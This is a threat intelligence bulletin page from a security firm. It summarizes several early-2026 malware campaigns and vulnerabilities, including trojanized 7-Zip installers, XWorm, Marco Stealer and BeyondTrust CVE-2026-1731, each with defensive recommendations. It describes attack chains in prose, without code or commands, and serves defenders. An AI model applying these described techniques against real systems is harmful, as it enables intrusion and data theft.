Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 Fake 7-Zip Download Sites Deliver Trojanized Installers that Enroll Windows Systems into Residential Proxy Networks
Malwarebytes reported on February 9, 2026, a malware campaign abusing lookalike domains impersonating the legitimate 7-Zip project to distribute trojanized installers. The activity centers on the domain 7zip[.]com, which is frequently mistaken for the legitimate http://7-zip[.]org site, and has been observed infecting consumer Windows systems for extended periods before detection. The malicious installer delivers a functional copy of 7-Zip alongside a concealed proxyware payload. During installation, additional binaries are dropped into C:\Windows\SysWOW64\hero\ and registered as Windows services running with SYSTEM privileges. The malware modifies firewall rules, profiles host hardware and network characteristics, and communicates with external infrastructure to enroll the victim system as a residential proxy node. Exploitation does not rely on a software vulnerability; instead, it abuses user trust and brand impersonation. The primary behavior is confirmed proxy monetization rather than traditional backdoor control.
Impact: Compromised systems are covertly repurposed as residential proxy nodes, allowing third parties to route traffic through the victim’s IP address. This can expose users and organizations to legal, reputational, and security risk if their systems are used for fraud, scraping, or other abusive activity. SYSTEM-level persistence, firewall rule manipulation, and encrypted communications increase dwell time and complicate detection and remediation.
Recommendation: Any system that has executed installers from 7zip[.]com should be treated as potentially compromised. Verify that 7-Zip is obtained only from the official http://7-zip[.]org domain and remove unauthorized Windows services or firewall rules associated with unexpected binaries under SysWOW64. Monitor endpoints for new auto-start services, netsh-based firewall changes, and outbound connections to known proxy infrastructure. Block identified command-and-control domains at the network perimeter.
🚩 Phorpiex phishing campaign uses LNK attachments to deliver GLOBAL GROUP ransomware
Forcepoint X-Labs reported a high-volume phishing campaign observed in early February 2026 that leveraged the Phorpiex botnet to deliver GLOBAL GROUP ransomware. The activity was documented on February 9, 2026, and relies on mass-distributed phishing emails with the subject “Your Document,” a lure commonly used at scale in 2024–2025. The infection chain begins with a weaponized Windows Shortcut (.lnk) attachment disguised as a document using double extensions and legitimate icons. When opened, the shortcut launches cmd.exe, which invokes PowerShell to download and execute a secondary payload. Phorpiex acts as the initial delivery mechanism, ultimately deploying GLOBAL GROUP ransomware, which operates fully offline and encrypts files locally without contacting command-and-control infrastructure.
Impact: This campaign demonstrates a low-noise ransomware delivery chain that minimizes network indicators and shortens detection windows. GLOBAL GROUP’s offline execution model, local key generation, and artifact cleanup increase the likelihood of successful encryption while complicating detection and recovery. Organizations relying primarily on network-based monitoring may have limited visibility into this activity until encryption has already occurred.
Recommendation: Configure email security to block or quarantine Windows shortcut (.lnk) attachments from external senders. It is also recommended to configure endpoint policies to restrict or closely monitor execution of shortcuts that spawn cmd.exe or PowerShell. Finally, organizations should ensure backups are offline or immutable and regularly tested.
🚩 FortiGuard Labs Reports XWorm RAT Campaign Delivered via Themed Phishing Emails and Malicious Excel Attachments Exploiting CVE-2018-0802
Fortinet FortiGuard Labs reported a multi-stage phishing campaign delivering a new variant of the XWorm remote access trojan (RAT), published February 10, 2026. The activity targets Windows users and uses multiple business-themed phishing emails in multiple languages, each carrying a malicious Excel add-in attachment (.XLAM). FortiGuard notes XWorm is an actively distributed RAT (including via Telegram-based marketplaces) and assesses the campaign impact as full remote control of the victim’s computer. In this chain, opening the crafted Excel attachment triggers exploitation of CVE-2018-0802 in Microsoft Equation Editor via a malformed embedded OLE object. The resulting shellcode downloads and executes an HTA file, which runs PowerShell to retrieve a JPEG that contains a transformed .NET module embedded between markers. The .NET module is loaded filelessly into memory and uses process hollowing to inject and execute the XWorm payload inside a newly created Msbuild.exe process. FortiGuard observed XWorm establishing AES-encrypted communications to its C2 and supporting extensive control commands and a plugin architecture.
Impact: If a user executes the malicious attachment on a vulnerable host, attackers can gain interactive remote control and deploy additional capabilities supported by XWorm, including data theft, system manipulation, and other attacker-directed actions via commands and plugins. The campaign’s use of fileless loading and process hollowing can reduce visibility for controls that rely heavily on on-disk artifacts, increasing the likelihood of successful post-compromise activity on affected Windows endpoints.
Recommendation: Patch and validate coverage for CVE-2018-0802 and ensure Microsoft Equation Editor-related legacy components are not exploitable in your environment. Block or quarantine Excel add-ins (.XLAM) and HTA execution from email and web-delivered content where feasible, and restrict mshta.exe and PowerShell to approved administrative contexts. Monitor or hunt for suspicious process chains consistent with this campaign, including Office or Equation Editor spawning mshta.exe, PowerShell download activity, and creation of suspended Msbuild.exe followed by memory injection behaviors.
🚩 Marco Stealer Info-stealer Targets Browsers, Crypto Wallets, and Cloud Data with Encrypted C2 and Anti-analysis Techniques
Zscaler ThreatLabz disclosed technical analysis of a newly identified information stealer dubbed Marco Stealer, first observed in the wild in June 2025. The malware is designed to exfiltrate browser data, cryptocurrency wallet information, clipboard contents, screenshots, and sensitive files stored locally and in cloud-synced directories such as Google Drive and Dropbox. Marco Stealer is delivered via a downloader that executes PowerShell to retrieve the payload over HTTP. Once executed, the malware performs extensive host profiling, employs encrypted strings and runtime decryption to evade static analysis, terminates common security and analysis tools, and encrypts stolen data using AES-256 before exfiltration via HTTP POST requests. Command-and-control communication is confirmed and operational, and the malware includes dedicated components for browser data decryption, named-pipe–based data collection, and credential harvesting from numerous applications and services.
Impact: Successful infection can result in theft of credentials, browser session data, cryptocurrency wallet material, cloud-stored documents, and other sensitive information, enabling account takeover, financial loss, and follow-on intrusion activity. Marco Stealer’s focus on anti-analysis, encrypted C2, and broad application coverage increases the likelihood of data loss before detection, particularly in environments without strong endpoint behavioral monitoring.
Recommendation: Restrict execution of unsigned or unexpected PowerShell download-and-execute activity and monitor for abnormal PowerShell command lines originating from user contexts. Enforce endpoint protections that detect process termination of security tools, suspicious browser process manipulation, and named pipe abuse. Limit user access to cryptocurrency wallets and sensitive cloud-synced directories on corporate endpoints, and ensure credential reuse is minimized through MFA enforcement and password rotation where compromise is suspected.
Active Exploitation of Internet-exposed SolarWinds Web Help Desk Enables Lateral Movement and Domain Compromise
Microsoft reported active, in-the-wild exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances. The activity targeted organizations running unpatched or exposed WHD deployments and resulted in attacker footholds that progressed toward high-value assets, including domain controllers. Initial access was achieved through exploitation of WHD vulnerabilities, but Microsoft has not confirmed which specific CVE was used. Affected systems were vulnerable to both newly disclosed January 2026 issues, including CVE-2025-40551 and CVE-2025-40536, and earlier vulnerabilities such as CVE-2025-26399. Successful exploitation enabled unauthenticated remote code execution, after which attackers relied on living-off-the-land techniques, legitimate administrative tooling, and low-noise persistence. Observed post-exploitation activity included PowerShell and BITS-based payload delivery, deployment of legitimate RMM tooling for interactive access, reverse SSH and RDP persistence, DLL sideloading for credential access, and escalation to DCSync in at least one environment.
Impact: This activity demonstrates how a single exposed service management application can lead to full domain compromise when vulnerabilities are unpatched or insufficiently monitored. Attackers were able to blend into normal administrative activity, evade detection, and escalate privileges using legitimate tools, increasing the likelihood of prolonged access, credential theft, and widespread organizational impact.
Recommendation: Organizations using SolarWinds Web Help Desk should review the source material and assess exposure. Patch affected WHD deployments for CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399 as applicable, and remove or restrict internet exposure of WHD services and administrative interfaces. Verify WHD servers are not unnecessarily accessible from untrusted networks. Leverage provided hunting queries.
BeyondTrust RS and PRA pre-auth RCE (CVE-2026-1731) allows unauthenticated OS command execution as the site user
BeyondTrust disclosed a critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA), tracked as CVE-2026-1731, with an advisory issued February 6, 2026 and updated February 10, 2026. The flaw is described as an OS command injection (CWE-78) with a CVSS v4 score of 9.9, impacting RS 25.3.1 and prior and PRA 24.3.4 and prior. BeyondTrust states it is not aware of customers being exploited at the time of disclosure. The vulnerability can be triggered via specially crafted client requests and requires no authentication or user interaction. Successful exploitation may allow an unauthenticated remote attacker to execute operating system commands in the context of the site user, which BeyondTrust notes can lead to system compromise, including unauthorized access, data exfiltration, and service disruption. BeyondTrust reports SaaS customers were patched as of February 2, 2026; self-hosted customers must apply the relevant patch or upgrade to a fixed version.
Impact: With this being a pre-authentication RCE in remote access infrastructure, any internet-exposed RS or affected PRA deployment presents a high-risk entry point. If exploited, attackers may gain code execution within the appliance context as the site user, which can enable rapid compromise and follow-on activity depending on the environment and integrations.
Recommendation: Organizations using BeyondTrust Remote Support or Privileged Remote Access should review the source material and assess exposure. Confirm whether you are SaaS-hosted or self-hosted and verify patch status. For self-hosted deployments, apply Patch BT26-02-RS (RS v21.3–25.3.1) or Patch BT26-02-PRA (PRA v22.1–24.x) or upgrade to a fixed release where applicable. Prioritize patching any internet-facing RS/PRA instances first and ensure appliances are not unnecessarily exposed to untrusted networks. If running RS older than 21.3 or PRA older than 22.1, complete the required version upgrade so the patch can be applied.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.